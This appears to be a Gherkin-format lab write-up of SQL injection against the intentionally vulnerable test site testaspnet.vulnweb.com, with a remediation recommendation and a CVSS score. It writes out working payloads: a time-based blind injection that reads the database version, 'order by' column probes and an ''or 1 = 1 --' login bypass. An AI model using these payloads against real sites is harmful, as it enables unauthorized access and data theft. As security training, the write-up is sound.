## Version 1.4.1
## language: en

Feature:
  TOE:
    Acublog
  Category:
    Unsafe Input
  Location:
    http://testaspnet.vulnweb.com/login.aspx - user (URL)
  CWE:
    CWE-089: Improper Neutralization of Special Elements used in an SQL Command
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard Unsafe Inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Detect and exploit unsafe inputs
  Recommendation:
    Always use parameterized queries

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Microsoft Windows | 10.0.17763.437  |
    | Google Chrome     | 76.0.3 (64 bit) |
  TOE information:
    Given I am accessing the site http://testaspnet.vulnweb.com
    And Entered a .NET site which uses SQL requests
    And IIS version 8.5
    And ASP.NET 2.0.5

  Scenario: Normal use case
    Given I go to "News" tab
    When I click on any news in the list
    Then It's displayed the news information

  Scenario: Static detection
    When I don't have access to source code
    Then I can't do the static detection

  Scenario: Dynamic detection
    Given I look for a news session
    Then I find testaspnet.vulnweb.com/ReadNews.aspx?id=0
    And I try to modify the end of the URL to try a SQLI
    """
    testaspnet.vulnweb.com/ReadNews.aspx?id=0'
    """
    And I get an error that is expected if the site is vulnerable
    Then I recognize the site is vulnerable to a SQL injection

  Scenario: Exploitation
    Given I access testaspnet.vulnweb.com/ReadNews.aspx?id=0
    When I try to use SQLi in the URL
    Then I try first check the database version
    And I add at the end of the URL SQL code as below:
    """
    testaspnet.vulnweb.com/ReadNews.aspx?id=0 and
    substring((select @@version),25,2) = 12 waitfor delay '0:0:5'
    """
    And I hit the enter key and the page reloads
    Then the page has a delay to show the information
    And after 5 seconds the page finally load
    Then I can conclude that the database version is 12
    Then I try to identify how many rows the query returns
    And I add at the end of the URL SQL code as below:
    """
    http://testaspnet.vulnweb.com/ReadNews.aspx?id=0%20order%20by%201
    http://testaspnet.vulnweb.com/ReadNews.aspx?id=0%20order%20by%202
    http://testaspnet.vulnweb.com/ReadNews.aspx?id=0%20order%20by%203
    http://testaspnet.vulnweb.com/ReadNews.aspx?id=0%20order%20by%204
    http://testaspnet.vulnweb.com/ReadNews.aspx?id=0%20order%20by%205
    """
    Then in the last request the page doesn't load any information
    And I can conclude that the query returns 4 rows

  Scenario: Remediation
    When the query is programmed it should use parametrized queries
    And use LINQ and Entity Framework that generates parametrized SQL commands
    Then the program can successfully avoid most of the known SQLi

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.8/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    5.6/10 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    4.7/10 (Medium) - CR:L

  Scenario: Correlations
    0089-sql-injection-login-bypass
      Given I access http://testaspnet.vulnweb.com/login.aspx
      When I try to use SQLi in the user input as below:
      """
      'or 1 = 1 --
      """
      And any word as a password
      Then I click on login button
      And I have access as logged user
